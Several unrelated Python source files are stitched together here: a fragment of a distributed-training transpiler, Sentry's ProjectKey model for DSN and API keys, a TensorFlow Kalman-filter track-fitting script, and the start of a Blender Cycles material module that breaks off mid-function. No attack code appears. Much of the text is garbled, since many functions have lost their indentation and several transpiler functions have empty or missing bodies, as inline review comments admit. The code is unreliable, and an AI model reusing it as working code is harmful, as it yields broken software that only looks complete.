                outputs=new_outputs,
                attrs=op.all_attrs(),
            )
    return s_prog
# ====================== private transpiler functions =====================
def _get_slice_var_info(self, slice_var):
block_suffix = "block"
block_idx = 0
offset = 0
is_slice = False
orig_var_name, block_name, _ = self._get_varname_parts(slice_var.name)
if not block_name:
return is_slice, block_idx, offset
def _get_distributed_optimizer_vars(self):
    """For every pserver endpoint, look up the distributed var of each
    optimizer op's Param input in ``self.vars_overview``.

    NOTE(review): the looked-up ``dist_var`` is never stored and the second
    inner loop has an empty body — the code that registered the remaining
    optimizer inputs appears to be absent in this variant; confirm against
    the upstream transpiler before relying on side effects here.
    """

    def _get_distributed_optimizer_var(endpoint):
        # Collect the optimizer ops whose Param lives on this endpoint.
        opt_op_on_pserver = []
        for _, op in enumerate(self.optimize_ops):
            if self._is_optimizer_op(op) and self._is_opt_op_on_pserver(
                endpoint, op
            ):
                opt_op_on_pserver.append(op)
        for opt_op in opt_op_on_pserver:
            dist_var = None
            for key in opt_op.input_names:
                if key == "Param":
                    param_name = opt_op.input(key)[0]
                    dist_var = (
                        self.vars_overview.get_distributed_var_by_origin_and_ep(
                            param_name, endpoint
                        )
                    )
                    break
            # Skip the main inputs; remaining keys would be optimizer state
            # (moments, etc.) — handling for them is absent here.
            for key in opt_op.input_names:
                if key in ["Param", "Grad", "LearningRate"]:
                    continue

    for ep in self.pserver_endpoints:
        _get_distributed_optimizer_var(ep)
def _update_dist_lookup_table_vars(self, param_list, grad_list, params_grads):
    """Filter param/grad lists for distributed lookup-table support.

    Currently a pass-through: returns the inputs unchanged. The lookup-table
    filtering logic is not implemented in this variant.
    """
    # TODO(wuyi): put find a way to put dist lookup table stuff all together.
    # update self.table_param_grad and self.trainer_side_table_grad_list
    program = self.origin_program
    return param_list, grad_list
def _init_splited_vars(self):
    """Slice params/grads into blocks and build the transpiler's mappings.

    Populates: param_var_mapping, grad_var_mapping, grad_param_mapping,
    param_grad_ep_mapping, and the opti var bookkeeping
    (_param_to_opti, _opti_to_param, _opti_var_list).
    """
    # update these mappings for further transpile:
    # 1. param_var_mapping: param var name -> [splited params vars]
    # 2. grad_var_mapping: grad var name -> [splited grads vars]
    # 3. grad_param_mapping: grad.blockx -> param.blockx
    # 4. param_grad_ep_mapping: ep -> {"params": [], "grads": []}
    param_list = []
    grad_list = []
    param_grad_set = set()
    for p, g in self.params_grads:
        # skip parameter marked not trainable
        if type(p) == Parameter and p.trainable == False:
            continue
        if p.name not in param_grad_set:
            param_list.append(p)
            param_grad_set.add(p.name)
        if g.name not in param_grad_set:
            grad_list.append(g)
            param_grad_set.add(g.name)
    # To do : consider lookup table later
    param_list, grad_list = self._update_dist_lookup_table_vars(
        param_list, grad_list, self.params_grads
    )
    if self.config.slice_var_up:
        # when we slice var up into blocks, we will slice the var according to
        # pserver services' count. A pserver may have two or more listening ports.
        grad_blocks = slice_variable(
            grad_list, len(self.pserver_endpoints), self.config.min_block_size
        )
        param_blocks = slice_variable(
            param_list, len(self.pserver_endpoints), self.config.min_block_size
        )
    # NOTE(review): there is no else-branch, so with slice_var_up disabled
    # grad_blocks/param_blocks are undefined below — confirm whether the
    # non-slice path was removed intentionally in this variant.
    assert len(grad_blocks) == len(param_blocks)
    # origin_param_name -> [splited_param_vars]
    self.param_var_mapping = self._create_vars_from_blocklist(
        self.origin_program, param_blocks
    )
    for orig_name, splited_vars in self.param_var_mapping.items():
        orig_var = self.origin_program.global_block().var(orig_name)
        for splited_var in splited_vars:
            is_slice, block_id, offset = self._get_slice_var_info(splited_var)
            self.vars_overview.add_distributed_var(
                origin_var=orig_var,
                slice_var=splited_var,
                block_id=block_id,
                offset=offset,
                is_slice=is_slice,
                vtype="Param",
            )
    # origin_grad_name -> [splited_grad_vars]
    self.grad_var_mapping = self._create_vars_from_blocklist(
        self.origin_program, grad_blocks
    )
    # add_trainer_suffix=self.trainer_num > 1)
    # dict(grad_splited_var -> param_splited_var)
    self.grad_param_mapping = collections.OrderedDict()
    for g, p in zip(grad_blocks, param_blocks):
        # block strings look like "varname:block_id:block_size"
        g_name, g_bid, _ = g.split(":")
        p_name, p_bid, _ = p.split(":")
        self.grad_param_mapping[
            self.grad_var_mapping[g_name][int(g_bid)]
        ] = self.param_var_mapping[p_name][int(p_bid)]
    # create mapping of endpoint -> split var to create pserver side program
    self.param_grad_ep_mapping = collections.OrderedDict()
    [
        self.param_grad_ep_mapping.update({ep: {"params": [], "opti": []}})
        for ep in self.pserver_endpoints
    ]
    opti_list = []
    opti_to_param = dict()
    param_to_opti = dict()
    for op in self.optimize_ops:
        # For each supported optimizer op, create a persistable
        # "<param>.opti.trainer_<id>" copy of the updated parameter and a
        # scale(1.0) op that copies the value into it.
        if (op.type == "sgd") or (op.type == "adam") or (op.type == "momentum"):
            origin_name = op.output("ParamOut")
            var = self.origin_program.global_block().var(origin_name[0])
            new_var_name = "%s.opti.trainer_%d" % (origin_name[0], self.trainer_id)
            self.origin_program.global_block().create_var(
                name=new_var_name,
                persistable=True,
                shape=var.shape,
                dtype=var.dtype,
                type=var.type,
                lod_level=var.lod_level,
            )
            new_var = self.origin_program.global_block().var(new_var_name)
            opti_list.append(new_var.name)
            opti_to_param[new_var.name] = var.name
            param_to_opti[var.name] = new_var.name
            self.origin_program.global_block().append_op(
                type="scale",
                inputs={"X": var},
                outputs={"Out": new_var},
                attrs={"scale": 1.0},
            )
    self._param_to_opti = param_to_opti
    self._opti_to_param = opti_to_param
    self._opti_var_list = opti_list
def _create_vars_from_blocklist(
    self, program, block_list, add_trainer_suffix=False
):
    """
    Create vars for each split.
    NOTE: only grads need to be named for different trainers, use
    add_trainer_suffix to rename the grad vars.
    Args:
        program (ProgramDesc): ProgramDesc which gradients blong.
        block_list (list[(varname, block_id, block_size)]): List of gradient blocks.
        add_trainer_suffix (Bool): Add trainer suffix to new variable's name if set True.
    Returns:
        var_mapping (collections.OrderedDict(varname->[new_varname_variable])):A dict mapping
            from original var name to each var split.
    """
    # varname->[(block_id, current_block_size)]
    block_map = collections.OrderedDict()
    var_mapping = collections.OrderedDict()
    # Group the "name:offset:size" block strings by variable name.
    for block_str in block_list:
        varname, offset, size = block_str.split(":")
        if varname not in block_map:
            block_map[varname] = []
        block_map[varname].append((int(offset), int(size)))
    for varname, splited in six.iteritems(block_map):
        orig_var = program.global_block().var(varname)
        if len(splited) == 1:
            # Unsplit var: map it to itself.
            var_mapping[varname] = [program.global_block().var(orig_var.name)]
            continue
        # NOTE(review): the multi-split branch (creating the ".blockN" vars)
        # is absent in this variant, so vars split into 2+ blocks are
        # silently dropped from the mapping — confirm against upstream.
    return var_mapping
def _clone_var(self, block, var, persistable=True):
return block.create_var(
name=var.name,
shape=var.shape,
dtype=var.dtype,
type=var.type,
lod_level=var.lod_level,
persistable=persistable,
)
def _get_varname_parts(self, varname):
# returns origin, blockid, trainerid
orig_var_name = ""
trainer_part = ""
block_part = ""
trainer_idx = varname.find(".trainer_")
if trainer_idx >= 0:
trainer_part = varname[trainer_idx + 1 :]
else:
trainer_idx = len(varname)
block_index = varname.find(".block")
if block_index >= 0:
block_part = varname[block_index + 1 : trainer_idx]
else:
block_index = len(varname)
orig_var_name = varname[0 : min(block_index, trainer_idx)]
return orig_var_name, block_part, trainer_part
def _is_op_connected(self, op1, op2):
# If one op's input is another op's output or
# one op's output is another op's input, we say
# the two operator is connected.
if set(op1.desc.output_arg_names()) & set(op2.desc.input_arg_names()) or set(
op1.desc.input_arg_names()
) & set(op2.desc.output_arg_names()):
return True
return False
def _create_ufind(self, optimize_ops):
    """Build a union-find structure over *optimize_ops*, unioning every
    pair of ops that are data-connected (see _is_op_connected)."""
    ufind = UnionFind(optimize_ops)
    total = len(optimize_ops)
    for first in range(total):
        for second in range(first, total):
            left = optimize_ops[first]
            right = optimize_ops[second]
            if self._is_op_connected(left, right):
                ufind.union(left, right)
    return ufind
def _is_optimizer_op(self, op):
if "Param" in op.input_names and "LearningRate" in op.input_names:
return True
return False
def _is_opt_op_on_pserver(self, endpoint, op):
param_names = [p.name for p in self.param_grad_ep_mapping[endpoint]["params"]]
if op.input("Param")[0] in param_names:
return True
def _get_input_map_from_op(self, varmap, op):
    """Returns a dict from op input name to the vars in varmap."""
    # NOTE(review): the body that fills the map is absent in this variant —
    # an empty OrderedDict is always returned; confirm against upstream.
    iomap = collections.OrderedDict()
    return iomap
def _get_lr_ops(self):
    """Collect learning-rate-decay ops from the origin program.

    NOTE(review): the loop reads each op's RPC role attribute but never
    appends anything, so this always returns an empty list in this variant
    — the filtering logic appears to have been removed; confirm upstream.
    """
    lr_ops = []
    block = self.origin_program.global_block()
    for op in block.ops:
        role_id = int(op.attr(RPC_OP_ROLE_ATTR_NAME))
    return lr_ops
def _is_opt_role_op(self, op):
    """Return True when *op* carries the Optimize op-role attribute."""
    # NOTE: depend on oprole to find out whether this op is for
    # optimize
    op_maker = core.op_proto_and_checker_maker
    optimize_role = core.op_proto_and_checker_maker.OpRole.Optimize
    # Compare as ints: the attribute is stored as an integer role value.
    if op_maker.kOpRoleAttrName() in op.attr_names and int(
        op.all_attrs()[op_maker.kOpRoleAttrName()]
    ) == int(optimize_role):
        return True
    return False
def _get_optimize_pass(self):
    """
    Get optimizer operators, parameters and gradients from origin_program
    Returns:
        opt_ops (list): optimize operators.
        params_grads (dict): parameter->gradient.
    """
    block = self.origin_program.global_block()
    opt_ops = []
    params_grads = []
    # tmp set to dedup
    optimize_params = set()
    origin_var_dict = self.origin_program.global_block().vars
    for op in block.ops:
        if self._is_opt_role_op(op):
            opt_ops.append(op)
            # The op-role-var attribute holds [param_name, grad_name].
            if op.attr(OP_ROLE_VAR_ATTR_NAME):
                param_name = op.attr(OP_ROLE_VAR_ATTR_NAME)[0]
                grad_name = op.attr(OP_ROLE_VAR_ATTR_NAME)[1]
                if not param_name in optimize_params:
                    optimize_params.add(param_name)
                    log("adding param_grad pair: ", param_name, grad_name)
                    params_grads.append(
                        [origin_var_dict[param_name], origin_var_dict[grad_name]]
                    )
    return opt_ops, params_grads
|
"""
sentry.models.projectkey
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
import petname
import six
from bitfield import BitField
from uuid import uuid4
from django.conf import settings
from django.core.urlresolvers import reverse
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from six.moves.urllib.parse import urlparse
from sentry import options
from sentry.db.models import (
Model, BaseManager, BoundedPositiveIntegerField, FlexibleForeignKey,
sane_repr
)
# TODO(dcramer): pull in enum library
class ProjectKeyStatus(object):
    # Integer values stored in ProjectKey.status.
    ACTIVE = 0
    INACTIVE = 1
class ProjectKey(Model):
    """Per-project API key pair (public/secret) used to build client DSNs."""
    __core__ = True

    project = FlexibleForeignKey('sentry.Project', related_name='key_set')
    label = models.CharField(max_length=64, blank=True, null=True)
    public_key = models.CharField(max_length=32, unique=True, null=True)
    secret_key = models.CharField(max_length=32, unique=True, null=True)
    roles = BitField(flags=(
        # access to post events to the store endpoint
        ('store', 'Event API access'),
        # read/write access to rest API
        ('api', 'Web API access'),
    ), default=['store'])
    status = BoundedPositiveIntegerField(default=0, choices=(
        (ProjectKeyStatus.ACTIVE, _('Active')),
        (ProjectKeyStatus.INACTIVE, _('Inactive')),
    ), db_index=True)
    date_added = models.DateTimeField(default=timezone.now, null=True)

    objects = BaseManager(cache_fields=(
        'public_key',
        'secret_key',
    ))

    # support legacy project keys in API
    scopes = (
        'project:read',
        'project:write',
        'project:delete',
        'project:releases',
        'event:read',
        'event:write',
        'event:delete',
    )

    class Meta:
        app_label = 'sentry'
        db_table = 'sentry_projectkey'

    __repr__ = sane_repr('project_id', 'public_key')

    def __unicode__(self):
        return six.text_type(self.public_key)

    @classmethod
    def generate_api_key(cls):
        # uuid4().hex yields a 32-char token, matching the key field length.
        return uuid4().hex

    @classmethod
    def from_dsn(cls, dsn):
        """Resolve a DSN string to its ProjectKey.

        Raises ProjectKey.DoesNotExist when no matching key exists
        (including malformed, non-integer project ids).
        """
        urlparts = urlparse(dsn)
        public_key = urlparts.username
        project_id = urlparts.path.rsplit('/', 1)[-1]
        try:
            return ProjectKey.objects.get(
                public_key=public_key,
                project=project_id,
            )
        except ValueError:
            # ValueError would come from a non-integer project_id,
            # which is obviously a DoesNotExist. We catch and rethrow this
            # so anything downstream expecting DoesNotExist works fine
            raise ProjectKey.DoesNotExist('ProjectKey matching query does not exist.')

    @classmethod
    def get_default(cls, project):
        """Return the first active store-capable key for *project*, or None."""
        try:
            return cls.objects.filter(
                project=project,
                roles=cls.roles.store,
                status=ProjectKeyStatus.ACTIVE
            )[0]
        except IndexError:
            return None

    @property
    def is_active(self):
        return self.status == ProjectKeyStatus.ACTIVE

    def save(self, *args, **kwargs):
        # Auto-generate key material and a human-readable label when absent.
        if not self.public_key:
            self.public_key = ProjectKey.generate_api_key()
        if not self.secret_key:
            self.secret_key = ProjectKey.generate_api_key()
        if not self.label:
            self.label = petname.Generate(2, ' ').title()
        super(ProjectKey, self).save(*args, **kwargs)

    def get_dsn(self, domain=None, secure=True, public=False):
        """Build the DSN URL for this key.

        A public DSN omits the secret key and prefers the public endpoint;
        ``domain``/``secure`` are unused here — presumably legacy parameters.
        """
        if not public:
            key = '%s:%s' % (self.public_key, self.secret_key)
            url = settings.SENTRY_ENDPOINT
        else:
            key = self.public_key
            url = settings.SENTRY_PUBLIC_ENDPOINT or settings.SENTRY_ENDPOINT
        if url:
            urlparts = urlparse(url)
        else:
            # Fall back to the configured system URL prefix.
            urlparts = urlparse(options.get('system.url-prefix'))
        return '%s://%s@%s/%s' % (
            urlparts.scheme,
            key,
            urlparts.netloc + urlparts.path,
            self.project_id,
        )

    @property
    def dsn_private(self):
        return self.get_dsn(public=False)

    @property
    def dsn_public(self):
        return self.get_dsn(public=True)

    @property
    def csp_endpoint(self):
        # URL browsers POST CSP violation reports to, keyed by public_key.
        endpoint = settings.SENTRY_PUBLIC_ENDPOINT or settings.SENTRY_ENDPOINT
        if not endpoint:
            endpoint = options.get('system.url-prefix')
        return '%s%s?sentry_key=%s' % (
            endpoint,
            reverse('sentry-api-csp-report', args=[self.project_id]),
            self.public_key,
        )

    def get_allowed_origins(self):
        from sentry.utils.http import get_origins
        return get_origins(self.project)

    def get_audit_log_data(self):
        # Snapshot of key fields recorded in the audit log.
        return {
            'label': self.label,
            'public_key': self.public_key,
            'secret_key': self.secret_key,
            'roles': int(self.roles),
            'status': self.status,
        }

    def get_scopes(self):
        return self.scopes
|
#~ imports from world
import time
import numpy as np
import argparse
from pprint import pprint
import tensorflow as tf
#~ imports from this repo
from generate_tracks import gen_tracks
# Deterministic runs: fix the RNG seed and force single-threaded TF so
# timings are reproducible.
np.random.seed(42)
tf.config.threading.set_intra_op_parallelism_threads(1)
tf.config.threading.set_inter_op_parallelism_threads(1)
argParser = argparse.ArgumentParser()
argParser.add_argument("-n", type=int, dest="n", default=1, help="nInputs")
args = argParser.parse_args()
n_gen = args.n  # number of tracks to generate (batch size)
d = 1.0  # Distance between planes
N = 5  # Number of planes
sigma = 10e-2  # Resolution of planes
z = 0.1  # Thickness of absorber
x0 = 0.01  # Radiation length of absorber
theta0 = 10e-3  # Multiple scattering uncertainty (TODO: use formula)
#~ initiate the matrices as numpy arrays
#~ F is the transfer matrix
F = np.array([[1, d, 0, 0],
              [0, 1, 0, 0],
              [0, 0, 1, d],
              [0, 0, 0, 1]])
#~ G is the noise matrix
G = np.array([[1 / sigma ** 2, 0, 0, 0],
              [0, 0, 0, 0],
              [0, 0, 1 / sigma ** 2, 0],
              [0, 0, 0, 0]])
#~ H the relation between the measurement m and the state p
H = np.array([[1, 0, 0, 0],
              [0, 0, 0, 0],
              [0, 0, 1, 0],
              [0, 0, 0, 0]])
#~ Q is the random error matrix, ie the scatter
# NOTE(review): np.zeros(4) is a length-4 vector, not a 4x4 matrix — it
# broadcasts when added to C_proj in project(); confirm this is intended.
Q = np.zeros(4)
#~ C0 is the initial parameters
C0 = np.array([[sigma ** 2, 0, 0, 0],
               [0, np.pi, 0, 0],
               [0, 0, sigma ** 2, 0],
               [0, 0, 0, np.pi]])
#~ Convert numpy arrays to tensors
F_tensor = tf.constant(F, dtype=tf.float32)
# NOTE(review): F_scalar is an unbatched copy of F_tensor used by
# project(); the name suggests "single (non-batched) F", not a scalar.
F_scalar = tf.constant(F_tensor, dtype=tf.float32)
# Batched transfer matrix: one copy of F per generated track.
F = tf.Variable(np.tile(F_tensor, (n_gen, 1, 1)), dtype=tf.float32)
G = tf.constant(G, dtype=tf.float32)
H = tf.constant(H, dtype=tf.float32)
Q = tf.constant(Q, dtype=tf.float32)
C0 = tf.constant(C0, dtype=tf.float32)
#~ initiate projected and filtered tracks and covariances
projectedTrack = None
projectedCov = None
filteredTrack = None
filteredCov = None
def residual(hits, p_filtered, H):
    """Calculates the residuals between hit and fitted track
    Takes: hits, p_filtered, H
    Returns: Tensor of residuals"""
    # Pad to shape of p, transpose to col vector
    # (pad the 2D hit up to the 4D state so it can be compared with H @ p)
    hits_full_dim = tf.transpose(tf.pad(tf.expand_dims(hits, 1), [[0, 0], [0, 1]]))
    return hits_full_dim - (H @ tf.transpose(p_filtered))
def chiSquared(residual, G, C_proj, p_proj, p_filt):
    """Calculates the chi-squared of the hit against fitted track
    Parameters: residual (as a function), G, current projection,
    projected path, filtered path (?)
    Returns: Tensor of Einstein Summations?"""
    # Measurement term: residual^T G residual, per batch element B.
    t1 = tf.einsum("iB,jB -> B", residual, G @ residual)
    p_diff = p_filt - p_proj
    # State term: (p_filt - p_proj)^T C_proj^-1 (p_filt - p_proj).
    # NOTE(review): "Bi,Bj -> B" sums i and j independently (an outer-sum
    # product), not the quadratic form "Bi,Bi -> B" — verify intent.
    C_diff = tf.einsum("Bij,Bj -> Bi", tf.linalg.inv(C_proj), p_diff)
    t2 = tf.einsum("Bi,Bj -> B", p_diff, C_diff)
    return t1 + t2
def project(F, p, C, Q):
    """Given the current state of the track, give an estimated
    projection of where the hit will be on the next detector plane"""
    # p_proj = tf.einsum('ji,iB->Bj', F_scalar, p)
    # With vector of Fs
    # Propagate each batch element's state with its own F (batch dim B).
    p_proj = tf.einsum("Bji,iB->Bj", F, p)
    # Covariance propagation uses the shared unbatched F_scalar global and
    # adds the process noise Q.
    C_proj = tf.transpose(F_scalar @ C) @ tf.transpose(F_scalar) + Q
    return p_proj, C_proj
def filter(p_proj, C_proj, H, G, m):
    """Correct the projected track, given the observed hit"""
    # NOTE(review): this shadows the builtin filter(); renaming would break
    # callers, so it is kept as-is.
    HG = tf.transpose(H) @ G
    # Innermost two axies must be 'matrix'
    inv_C_proj = tf.linalg.inv(C_proj)
    # Updated covariance: (C_proj^-1 + H^T G H)^-1, batched over B.
    C = tf.linalg.inv(inv_C_proj + HG @ H)  #~ ? what takes precedence here? @?
    # Reversing batch dimension -> fix me!
    p = tf.einsum("Bij,Bj->Bi", inv_C_proj, p_proj) + tf.einsum("ji,iB->Bj", HG, m)
    p = tf.einsum("Bij,Bj->Bi", C, p)
    return p, C
def bkgTransport(C, F, C_proj):
    """Smoother gain: A = C F^T C_proj^-1, batched (B, 4, 4)."""
    # Extra transpose (both) to make this work with axis ordering
    return C @ tf.transpose(F, (0, 2, 1)) @ tf.linalg.inv(C_proj)
def smooth(p_k1_smooth, p_k1_proj, C_k1_smooth, C_k1_proj, p_filtered, C_filtered, A):
    """Once all observations and filtering stages have been applied,
    smooth the overall track into a single linear trajectory"""
    # Also reversed batches!
    # Pull the filtered state toward the (k+1) smoothed estimate via gain A.
    p_smooth = p_filtered + tf.einsum("Bij,jB->iB", A, p_k1_smooth - p_k1_proj)
    # Transpose only inner 'matrix' dimensions
    C_smooth = C_filtered + A @ (C_k1_smooth - C_k1_proj) @ tf.transpose(A, (0, 2, 1))
    return p_smooth, C_smooth
def project_and_filter_internal(i, m, hits, p, C,
                                filteredTrack,
                                filteredCov,
                                projectedTrack,
                                projectedCov):
    """One projection+filter step for plane *i*.

    Reads the previous plane's filtered state, projects it forward, loads
    plane i's measured hits into *m*, filters, and returns the projected
    and (transposed) filtered state/covariance.

    NOTE(review): the p and C parameters are immediately overwritten from
    filteredTrack/filteredCov — presumably kept for a planned tf.function
    signature; confirm.
    """
    global F  #* ?
    p = filteredTrack[i - 1]
    C = filteredCov[i - 1]
    p_proj, C_proj = project(F, p, C, Q)
    # Load the (x, y) hit of plane i into the measurement vector slots 0/2.
    m[0, :].assign(hits[:, i, 0])
    m[2, :].assign(hits[:, i, 1])
    p_filt, C_filt = filter(p_proj, C_proj, H, G, m)
    # res = residual(hits[:,i], p_filt, H)
    # chiSq = chiSquared(res, G, C_proj, p_proj, p_filt)
    # skipIdxs = tf.where(chiSq > 100. * tf.ones(chiSq.shape))
    # p_proj = tf.tensor_scatter_nd_update(p_proj, skipIdxs, tf.squeeze(tf.gather(projectedTrack[i-1], skipIdxs), axis = 1))
    # C_proj = tf.tensor_scatter_nd_update(C_proj, skipIdxs, tf.squeeze(tf.gather(projectedCov[i-1], skipIdxs), axis = 1))
    #
    # p_filt = tf.tensor_scatter_nd_update(p_filt, skipIdxs, tf.squeeze(tf.gather(tf.transpose(filteredTrack[i-1]), skipIdxs), axis = 1))
    # C_filt = tf.tensor_scatter_nd_update(C_filt, skipIdxs, tf.squeeze(tf.gather(tf.transpose(filteredCov[i-1], (2, 0, 1)), skipIdxs), axis = 1))
    #
    # # Reset, in case we set this to + 1 last time
    # F = F_init
    # F = tf.tensor_scatter_nd_update(F, skipIdxs, tf.squeeze(tf.gather(F, skipIdxs), axis = 1) + updF)
    # TODO: Sort out this transpose nightmare....
    #? why what's wrong with it?
    # Match the storage layout used for filteredTrack/filteredCov.
    p_filt = tf.transpose(p_filt)
    C_filt = tf.transpose(C_filt, (1, 2, 0))
    return p_proj, C_proj, p_filt, C_filt
if __name__ == "__main__":
# n_gen defined globally
#~ input are generated tracks.
#~ outputs are project track, proj covariance,
#~ smooth track, smooth covariance,
#~ filtered track, filtered covariance
hits, trueTracks = gen_tracks(n_gen=n_gen)
print("hits\n", hits, "\ntruetracks\n", trueTracks)
hits = tf.constant(hits, dtype=tf.float32)
m0 = tf.Variable(tf.zeros((4, n_gen))) # (hit_x, slope_x, hit_y, slope_y)
m0[0, :].assign(hits[:, 0, 0]) # First plane, x hits
m0[2, :].assign(hits[:, 0, 1]) # First plane, y hits
p0 = m0
C0 = tf.constant(np.stack([C0 for i in range(n_gen)], -1), dtype=tf.float32)
start = time.perf_counter()
p_proj, C_proj = project(F, p0, C0, Q)
p, C = filter(p_proj, C_proj, H, G, m0)
p = tf.transpose(p)
C = tf.transpose(C, (1, 2, 0))
projectedTrack = tf.Variable([p_proj for i in range(N)])
projectedCov = tf.Variable([C_proj for i in range(N)])
filteredTrack = tf.Variable([p for i in range(N)])
filteredCov = tf.Variable([C for i in range(N)])
m = tf.Variable(tf.zeros((4, n_gen)))
for i in range(1, N):
#~ project forward, filter / smooth backwards.
p_proj, C_proj, p_filt, C_filt = project_and_filter_internal(
tf.constant(i),
m,
hits,
p,
C,
filteredTrack,
filteredCov,
projectedTrack,
projectedCov)
filteredTrack[i].assign(p_filt)
filteredCov[i].assign(C_filt)
projectedTrack[i].assign(p_proj)
projectedCov[i].assign(C_proj)
smoothedTrack = tf.Variable([filteredTrack[-1] for i in range(N)])
smoothedCov = tf.Variable([tf.transpose(filteredCov[-1]) for i in range(N)])
reversedPlaneIndices = list(range(0, N - 1))
reversedPlaneIndices.reverse()
for i in reversedPlaneIndices:
p_k1_proj, C_k1_proj = projectedTrack[i + 1], projectedCov[i + 1]
p_filtered, C_filtered = filteredTrack[i], filteredCov[i]
p_k1_smooth, C_k1_smooth = smoothedTrack[i + 1], smoothedCov[i + 1]
A = bkgTransport(tf.transpose(C_filtered, (2, 0, 1)), F, C_k1_proj)
p_smooth, C_smooth = smooth(
p_k1_smooth,
tf.transpose(p_k1_proj),
C_k1_smooth,
C_k1_proj,
p_filtered,
tf.transpose(C_filtered, (2, 0, 1)),
A)
smoothedTrack[i].assign(p_smooth)
smoothedCov[i].assign(C_smooth)
end = time.perf_counter()
print(f"Time elapsed: {end - start}")
print(f"Projected\n {p_proj} \n Filtered\n {p_filt} \n Smooth\n {p_smooth} \n SmCov\n {C_smooth}")
|
<gh_stars>0
# Copyright (c) 2016-2021, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import bpy
import math
import os
from mathutils import Vector, Matrix, Color
from .material import Material, WHITE, GREY, BLACK, isWhite, isBlack
from .error import DazError
from .utils import *
#-------------------------------------------------------------
# Cycles material
#-------------------------------------------------------------
class CyclesMaterial(Material):
    """Material subclass that builds a Cycles/Eevee node tree for a DAZ
    material and applies post-build geometry-dependent corrections."""

    def __init__(self, fileref):
        Material.__init__(self, fileref)
        self.classType = CyclesMaterial
        # Node tree wrapper (CyclesTree/PbrTree/hair tree), set in build().
        self.tree = None
        self.useEevee = False

    def __repr__(self):
        treetype = None
        if self.tree:
            treetype = self.tree.type
        geoname = None
        if self.geometry:
            geoname = self.geometry.name
        return ("<%sMaterial %s r:%s g:%s i:%s t:%s>" % (treetype, self.id, self.rna, geoname, self.ignore, self.hasAnyTexture()))

    def guessColor(self):
        """Pick a viewport display color: skin color for characters and
        grafted meshes, clothes color otherwise."""
        from .guess import guessMaterialColor
        from .geometry import GeoNode
        from .finger import isCharacter
        color = LS.clothesColor
        if isinstance(self.geometry, GeoNode):
            ob = self.geometry.rna
            if ob is None:
                pass
            elif isCharacter(ob):
                color = LS.skinColor
            elif ob.data and ob.data.DazGraftGroup:
                color = LS.skinColor
        guessMaterialColor(self.rna, GS.viewportColors, False, color)

    def build(self, context):
        """Build the Blender material and its shader node tree."""
        if self.dontBuild():
            return
        Material.build(self, context)
        self.tree = self.setupTree()
        self.tree.build()

    def setupTree(self):
        """Choose the node-tree class: hair tree for strand hair,
        PBR tree for metallic or principled setups, Cycles tree otherwise."""
        from .pbr import PbrTree
        if self.isHair:
            from .hair import getHairTree
            geo = self.geometry
            if geo and geo.isStrandHair:
                geo.hairMaterials.append(self)
            return getHairTree(self)
        elif self.metallic:
            return PbrTree(self)
        elif GS.materialMethod == 'PRINCIPLED':
            return PbrTree(self)
        else:
            return CyclesTree(self)

    def postbuild(self):
        """Apply per-mesh corrections (emission and bump strength scaled by
        surface area) and optionally prune unused nodes."""
        Material.postbuild(self)
        geonode = self.geometry
        me = None
        if geonode and geonode.data and geonode.data.rna:
            geo = geonode.data
            me = geo.rna
            # Find this material's slot index on the mesh.
            mnum = -1
            for mn, mat in enumerate(me.materials):
                if mat == self.rna:
                    mnum = mn
                    break
            if mnum < 0:
                return
            nodes = list(geo.nodes.values())
            if self.geoemit:
                self.correctEmitArea(nodes, me, mnum)
            if self.geobump:
                area = geo.getBumpArea(me, self.geobump.keys())
                self.correctBumpArea(area)
        if self.tree:
            if GS.pruneNodes:
                marked = pruneNodeTree(self.tree)
                if isinstance(self.tree, CyclesTree):
                    self.tree.selectDiffuse(marked)

    def addGeoBump(self, tex, socket):
        """Register a bump-distance socket fed by *tex* for later
        area-based correction in correctBumpArea()."""
        bumpmin = self.getValue("getChannelBumpMin", -0.01)
        bumpmax = self.getValue("getChannelBumpMax", 0.01)
        socket.default_value = (bumpmax-bumpmin) * LS.scale
        key = tex.name
        if key not in self.geobump.keys():
            self.geobump[key] = (tex, [])
        self.geobump[key][1].append(socket)

    def correctBumpArea(self, area):
        """Rescale bump distances from texel density over the mesh *area*."""
        if area <= 0.0:
            return
        for tex, sockets in self.geobump.values():
            if not hasattr(tex, "image") or tex.image is None:
                continue
            width, height = tex.image.size
            density = width * height / area
            if density == 0.0:
                continue
            # Account for UV mapping scale feeding the texture, if any.
            link = getLinkTo(self.tree, tex, "Vector")
            if link and link.from_node.type == 'MAPPING':
                scale = link.from_node.inputs["Scale"]
                density *= scale.default_value[0] * scale.default_value[1]
            if density == 0.0:
                continue
            if density > 0:
                height = 3.0/math.sqrt(density)
                for socket in sockets:
                    socket.default_value = height

    def correctEmitArea(self, nodes, me, mnum):
        """Divide emission strengths by the world-space surface area of the
        faces using this material, measured on a temporary mesh copy."""
        ob = nodes[0].rna
        ob.data = me2 = me.copy()
